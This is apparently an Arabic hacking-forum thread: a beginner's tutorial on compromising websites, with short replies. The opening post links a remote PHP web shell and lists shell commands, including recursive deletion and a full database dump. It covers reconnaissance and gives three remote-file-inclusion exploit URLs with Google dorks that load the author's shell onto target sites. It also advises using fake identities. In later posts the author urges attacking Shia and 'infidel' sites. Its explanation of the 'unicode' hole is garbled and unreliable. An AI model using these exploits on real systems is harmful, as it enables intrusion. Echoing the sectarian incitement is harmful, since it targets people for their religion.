اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

درس لمبتداي اختراق المواقع عبارة عن معلومات عاااامة

درس لمبتداي اختراق المواقع عبارة عن معلومات عاااامة


النتائج 1 إلى 8 من 8

الموضوع: درس لمبتداي اختراق المواقع عبارة عن معلومات عاااامة

  1. #1
    هكر نشيط Array الصورة الرمزية البلوي
    تاريخ التسجيل
    Jul 2010
    المشاركات
    114

    Hasri درس لمبتداي اختراق المواقع عبارة عن معلومات عاااامة



    السلام عليكم ورحمة الله وبركاتة اليوم جيابلكم درس لاختراق المواقع تبعا لموضوعي برنامج الشل لاختراق المواقع
    اولا لتحميل الشيل

    www.halimdz.jeeran.com/shell.txt?

    اولا تعريف الشل :

    هو اكواد مكتوبه بلغه PHP ويمكنك من خلالها تطبيق اوامر النكس على السرفر برحتك
    ويوجد فى بعض الاحيان ان الشيل لا يعمل ..........
    طبعا لان يوجد نظام حمايه ويسمى
    safe mode وهيه نظام من نظم االحمايه حيث انه يتم عن طريق ملفات .htaccess
    وعند تطبيق اى امر من الاوامر تظهر الرساله الاتيه

    No such file or dirctory
    او
    permmission denied



    =-------------------------------------------=

    تعديل ملف.

    مثلا لتعديل الملف ضع الأمر

    pico filename
    filenamr : اسم الملف المراد تعديله

    سوف يفتح محرر النصوص

    حرر ما ترغب به وأضغط
    ctrl x
    ثم أختر yes للحفظ no لعدم الحفظ


    =-------------------------------------------=

    سحب ملف

    wget http://www.domain.com/filename.zip


    =-------------------------------------------=


    فتح مجلد


    cd folder name
    ( folder name ) اسم الملف

    =-------------------------------------------=

    مسح مجلد ,والي فيه
    rm -rf folder

    =-------------------------------------------=

    لنسخ ملفات

    cp -r /home/user1/public_html/filename /home/user2/public_html/

    =-------------------------------------------=

    لنقل الملفات

    mv filename.tar.gz /home/user/public_html

    =-------------------------------------------=


    لعمل باك من قاعدة

    mysqldump -u root -p --all-databases > alrudbs207.sql

    =-------------------------------------------=

    ملكية الشخص

    chown -R user /home/user

    =-------------------------------------------=

    لاستعراض ما بداخل المجلد
    ls

    =-------------------------------------------=


    لضغط

    tar -czvf filename.tar.gz filename


    =-------------------------------------------=

    أعطاء تصريح المرغوب به

    chmod 644 file.tar.gz

    =-------------------------------------------=

    بسم الله بعد الإنتهاء من أوامر الشل نأتي للإختراق
    يجب ان تعرف لاختراق أي موقع تحتاج لمعرفة بعض المعلومات عن الهدف(الموقع) كنظام التشغيل الذي يعمل عليه والخدمات الموجودة بالموقع
    لا تتعجل فشرح هذه الأمور قادم لتعرف أي الثغرات ستسخدم أوستستغل لاختراق الموقع وفي هذا الملف سأشرح لك كيفية عمل ذلك و كيفية الاستفادة من تلك المعلومات.

    1- عليك عمل بورت سكان لمعرفة البورتات أو المنافذ المفتوحة بالموقع
    من الويندوز يمكنك استخدام برنامج Super Scan موجود بالموقع مع الشرح.
    وتفيدك هذه العملية فيما بعد في نزع التوقيع فمثلا لو وجدت ان موقعا مفتوح به البورت 23 وهو للتلنت
    يمكنك الذهاب إلى تلنت وهو برنامج يأتي مع الويندوز

    إبدأ==>تشغيل

    ثم اكتب

    telnet
    بعد ذلك إضغط على قائمة
    connect
    ثم
    Remote System
    ستظهر لك شاشة اكتب اسم الموقع في Host Name واترك المنفذ كما هو telnet
    ثم اضغط
    connect
    سيتصل بالموقع وحينئذ سيظهر نظام التشغيل للموقع.
    وأهم البورتات هي
    23 للتلنت وهي خدمة تسمح لمستخدميها بالاتصال بأي جهاز آخر يستعمل نفس الخدمة
    21 للإف تي بي أو بروتوكول نقل الملفات FTP=Files Transefiring Protocol
    والبريد الصادر والوارد 110 - 25

    21 FTP
    22 SSH
    23 Telnet
    25 SMTP
    79 Finger
    80 HTTP
    110 POP3

    وللإتصال ببورت معين من التلنت اكتب البورت في خانة Port مكان كلمة Telnet
    هذا الموقع يمكنك من معرفة العديد من الأشياء عن اي موقع
    http://www.psyon.org/tools/index.html
    2- الخطوة الثانية هي ما يسميه البعض نزع التوقيع أو فحص البانر.
    والبانر هو الرسالة التي تراها حين تحاول الاتصال بجهاز ما (أو موقع فلا فرق ) عبر منفذ (بورت) معين.
    فمثلا حين تحاول الاتصال عبر البورت 23 وهو للتلنت مع جهاز يعمل على نظام لينكس ماندريك سيظهر لك الآتي :

    Linux Mandrake release 6.1 (Helios)
    Kernel 2.2.13-4mdksmp on an i686
    login:
    ما عرفناه من هذا أن هذا الجهاز يعمل على نظام تشغيل لينكس مانريك 6.1 والنواة هي 2.2.13.


    3- شيء آخر عليك ملاحظته هو رسائل الأخطاء! ومن أشهرها الرسالة 404 Error وهي تظهر عند طلب ملف غير موجود بالموقع وعند ظهور هذه الصفحة انظر
    إلى أسفل الصفحة وقد تجد معلومات مثل إصدارة ملقم الويب وهذه معلومات غير مضرة أو خطيرة لكنها تفيد
    في عملية الاختراق
    * عليك ان تعرف أن الموقع هو عبارة عن جهاز كمبيوتر لكنه يعمل 24 ساعة ويوجد به ملقم ويب (خادم) Web Server ويعمل على نظام تشغيل وأنت حين تخترق فإنك تخترق هذا
    الجهاز الذي توجد عليه كل ملفات الموقع وقد يوجد على الجهاز أكثر من موقع مثل شركات الإستضافة وهذه تكون ضربة الهاكر الكبرى...
    يجب عليك معرفة الأشياء التالية عن اي موقع :

    - معرفة &##1606;نوع وإصدارة ملقم الويب هل هو IIS4 - IIS5 هل هو Apache ....
    - معرفة &##1606;نظام التشغيل وإصدارته هل هو ******s200 مثلا أو Linux redhat 6.2 مثلا...
    وعليك معرفة ذلك لأن لكل نظام تشغيل الثغرات الخاصة به...وأيضا توجد ثغرات لملقم الويب مثل ثغرة اليونيكود لسيرفرات IIS.
    - معرفة &##1603;كل سكربتات بيرل وسي جي آي الموجودة بالموقع مثل المنتديات وسجل الزوارأو عداد الزوار وهكذا.....
    - وأيضا &##1605;معرفة كل الخدمات الأخرى بالموقع كالبريد وغيرها...ومثلا معرفة نوع وإصدارة سيرفر الإف تي بي إن وجد بالموقع (حسب البورت سكان كما سبق)
    وأيضا مفسر نصوص بيرل إن وجد ... كل هذه الأشياء يمكنك إيجاد ثغرات لها...حسنا كيف تعرف هذه المعلومات عن الموقع


    أولا كيف تعرف هذه الأشياء؟

    - معرفة &##1606;نظام التشغيل.يمكن معرفة نظام التشغيل من التلنت إن وجد بالموقع كما سبق.
    ويمكنك معرفة ملقم الويب ونظام التشغيل من بعض البرامج أو من هذا الموقع
    http://www.netcraft.com/
    و
    http://www.netcraft.net/

    واكتب اسم الموقع في المكان المخصص لذلك ثم اضغط على Lookup أو انتر.
    سيظهر لك الملقم و نظام التشغيل وإصدارتيهما مثلا هذه معلومات عن أحد المواقع
    عن طريق الموقع السابق
    Apache/1.2.6 FrontPage/3.0.4.1 on FreeBSD
    يظهر هنا أن ملقم الويب هو
    Apache
    النسخة/الإصدارة
    1.2.6
    مع دعم الفرونت بيج
    ونظام التشغيل يأتي بعد كلمة on وهو
    FreeBSD
    يمكنك الآن البحث عن ثغرات لهذه النسخة من الملقم أو نظام التشغيل
    والفرونت بيج توجد به الكثير من الثغرات ويهمنا منها
    _private
    _vti_pvt
    _vti_cnf
    وأحيانا
    _vti_bin
    - يمكنك &##1605;معرفة سكربتات تبيرل وسي جي آي الموجودة بالموقع عن طريق الذهاب إلى الصفحة الرئيسية للموقع
    (ليست صفحة الترحيب كما في بعض المواقع) بل الصفحة التي تستطيع منها التعامل مع الموقع والتي
    قد ترى بها محرك بحث أو منتدى أو قائمة تصويت أو قائمة بريدية أو أي مربع يطلب منك كتابة أي معلومة.
    (ملحوظة بعض هذه المربعات قد تكون جافا سكريبت)
    ثم إضغط بالزر الأيمن للفأرة في أي مكان من الصفحة واختر من القائمة التي ستظهر إظهار المصدر
    View Source
    وابحث فيها عن أسماء ملفات تنتهي بـ
    .pl و .cgi
    ويمكنك البحث عن ثغرات لها ..
    - يمكنك &##1605;معرفة سيرفر البريد بعد ذلك ونوع سيرفر الإف تي بي الخاص يالموقع
    من خلال عملية نزع التواقيع كما سبق بالاتصال بالموقع من البورتات 25 - 21 - 110

    حسنا إنتهت الآن الآن عملية جمع المعلومات عن الموقع....عليك الآن البحث عن ثغرات لها....

    1- ماهي الثغرات ؟
    الثغرات هي أخطاء برمجية في برامج معينة مثل سيرفرات المواقع وأي برامج اخرى ، لأنها من صنع البشر لذا
    يجب أن تحتوي على أخطاء أو ( ثغرات) وهناك أنواع أخرى عبارة عن برامج مصممة ومكتوبة بلغات معينة
    لاستغلال ثغرة معينة.
    ويطلق عليها أسماء كثير مثل :
    Exploits - Bugs - holes - security holes - vulnerabilities

    2- أنواع الثغرات :
    أولا : ثغرات المتصفح : هي ثغرات يتم استغلالها من المتصفح
    وتلحق باسم الموقع ولها أنواع مثل اليونيكود وثغرات
    السي جي آي CGI bugs وبعضها يمكن استخدامها مباشرة من المتصفح مثل اليونيكود وبعض ثغرات السي



    نبدأ الكثير من الشباب و الأعضاء لا يعرفون أسهل الثغرات و هي ثغرة ليونيكود

    تعريف ثغرة ليونيكود :

    هي عبارة عن خطأ في تصميم الموقع و يتم استغلالها عن طريق المتصفح
    مثلا عندك موقع
    إذا كان الموقع هو
    www.site.com/
    فتكتب الثغرة هكذا في المتصفح
    www. site.com/cgi-bin/passwd.txt
    هذه الثغرة تعرض لك أسماء المستخدمين وكلمات
    المرور للمستخدمين للموقع مثل المدير
    و لكن أنت طبعا لا تجرب هذه الثغرة لأنها صارت قديمة جدا جدا فمثلا إذا ذهبت للأيسكيمو و جرتها لا تنجح معهم لأنها قديمة جدا

    الآن إنشاء الله نكون كفية في شرح ثغرة ليونيكود

    الآن كيفية استغلالها

    نحن كما سبق قلنا أن ثغرة ليونيكود يكون استغلالها عن طريق المتصفح

    بعض الثغرات و كيفية إستغلالها


    الان الثغرة الاولى

    من 10 سنين
    (حتى ه File inclusion


    Google search : "powered by sphider

    لينك استخدام الثغرة


    http://[target]/[path]/admin/configset.php?cmd=ls%20-la&settings_dir=

    بعد علامة = تضع رابط الشل و أنا اديكم و احد جيد

    www.halimdz.jeeran.com/shell.txt

    فيصبح هكذا

    http://[target]/[path]/admin/configset.php?cmd=ls%20la&settings_dir=www.halimdz .jeeran.com/shell.txt?


    الان شوف الساف مود إن لم يكن شغال فتتمكن من التحكم و إعطاء الأوامر للشل



    الثغرة الثانية

    Google search :

    "Powered by: Virtual War v1.5.0"

    اللينك لاستخدام الثغرة :

    www.site.com/admin/admin.php?vwar_root=your shell

    بعد إضافة الشل تبعي يصبح هكذا

    http://www.site.com/admin/admin.php?...com/shell.txt?
    )
    الان شوف الساف مود إن لم يكن شغال فتتمكن من التحكم و إعطاء الأوامر للشل وانت ودماغك بقى


    نأتي للثغرة الثالثة

    Google search : "Powered by TotalCalendar"

    لينك استخدام الثغرة :
    www.site.com/about.php?inc_dir=your shell


    بعد إضافة الشل تبعي يصبح هكذا


    http://www.site.com/about.php?inc_di...com/shell.txt?

    و في الأخير يا أعضاء بيت الهكر

    وأنصحكم بشدة بالتسجيل في قوائمهم البريدية حيث يمدونك بأحدث الثغرات أولاً باول ويوميا
    نصيحة : استخدم بريدًا وهميا بمعلومات وهمية وأسماء وهمية


    http://www.securityfocus.com/

    http://www.securiteam.com/

    www.7azm.net/vb


    http://www.nafitha.org/

    http://blacksun.box.sk/

    http://packetstorm.decepticons.org/

    http://www.antionline.com/


    http://blacksun.box.sk/tutorials.html

    http://www.securitywriters.org/****s/hackfaq.php#top

    http://www.securitywriters.org/****s.html

    http://www.thenewbiesarea.com/****s.shtml#top

    http://www.ussrback.com/

    http://www.nor2000.com/

    http://www.securitywriters.org/

    http://www.nafitha.com/

    http://packetstormsecurity.nl/

    http://www.securetips.com/

    http://www.wiretrip.net/

    http://www.secureroot.com/



  2. #2
    هكر نشيط Array الصورة الرمزية البلوي
    تاريخ التسجيل
    Jul 2010
    المشاركات
    114

    افتراضي رد: درس لمبتداي اختراق المواقع عبارة عن معلومات عاااامة

    تقبلوا تحياتي لكم حزين تبوك
    وأرجو أنكم لاتستخدموة في أذية المسلمين عليكم بالشيعة والكفاار


  3. #3
    هكر متميز Array الصورة الرمزية hooos
    تاريخ التسجيل
    Jul 2010
    الدولة
    في كوكب لوحدي
    المشاركات
    1,878

    افتراضي رد: درس لمبتداي اختراق المواقع عبارة عن معلومات عاااامة

    مشكور والله يعطيك العافيه



  4. #4
    محظور Array
    تاريخ التسجيل
    Nov 2010
    المشاركات
    843

    افتراضي رد: درس لمبتداي اختراق المواقع عبارة عن معلومات عاااامة



  5. #5
    هكر مبتديء Array الصورة الرمزية Black Spider
    تاريخ التسجيل
    Jun 2009
    الدولة
    ~ :: ~ HaCkEd By Black.Spider ~ :: ~
    المشاركات
    73

    افتراضي رد: درس لمبتداي اختراق المواقع عبارة عن معلومات عاااامة

    الف شكر لك اخي البلوي


  6. #6
    هكر نشيط Array الصورة الرمزية البلوي
    تاريخ التسجيل
    Jul 2010
    المشاركات
    114

    افتراضي رد: درس لمبتداي اختراق المواقع عبارة عن معلومات عاااامة

    العفو وهذا واجبنا
    لازم نخترق جميع مواقع الشيعة



  7. #7
    هكر متميز Array الصورة الرمزية sunlight
    تاريخ التسجيل
    Dec 2010
    المشاركات
    431

    افتراضي رد: درس لمبتداي اختراق المواقع عبارة عن معلومات عاااامة

    الف شكر لك اخوي ... بالتوفيق للجميع


  8. #8
    هكر مبتديء Array
    تاريخ التسجيل
    Feb 2011
    المشاركات
    8

    افتراضي رد: درس لمبتداي اختراق المواقع عبارة عن معلومات عاااامة

    مشكور اخي واصل


المواضيع المتشابهه

  1. اختراق المواقع المستهدف
    بواسطة kadirofe في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 6
    آخر مشاركة: 01-16-2011, 11:21 AM
  2. درس في اختراق المواقع
    بواسطة xVx في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 7
    آخر مشاركة: 11-21-2010, 06:13 AM

وجد الزوار هذه الصفحة بالبحث عن:

لمعرفه اذا كان المتصفح به ثغرات او لا

اجمل واسهل اختراق بالعالم FTP_files

powered by sphider

طريقة معرفة نظام تشغيل الموقع

اسعارعروض التجميل للمبتداى

عبارة المعلومات عن الموقع في المنتديات

شرح ثغرة Powered by TotalCalendar

اختراق المواقع ومعرفة اللينكات

_vti_binsearch ثغرة

طريقه معرفه الموقع يوجد فيه ثغره او لا

cds of black spider for hacker

تعريف الشل لأختراق

لينكات البحث عن shell.php

لمعرفة نظام التشغيل عن طريق الشل

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •